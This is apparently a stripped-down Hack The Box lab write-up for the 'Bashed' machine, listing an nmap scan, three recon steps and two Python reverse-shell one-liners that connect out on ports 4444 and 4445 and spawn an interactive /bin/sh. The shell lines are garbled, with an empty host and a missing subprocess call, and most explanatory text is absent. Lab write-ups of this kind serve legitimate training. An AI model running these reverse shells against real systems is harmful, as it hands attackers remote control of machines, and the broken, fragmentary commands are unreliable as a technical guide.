Bashed — Hack The Box WriteUp

nmap -p- [bashedIP]
  1. A deeper nmap scan (with the -A, -T4 and scripts options).
  2. Explore the web page ourselves (for potential areas for SQL injections or anything else).
  3. Start a directory buster on the IP since it is hosting a web server.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'




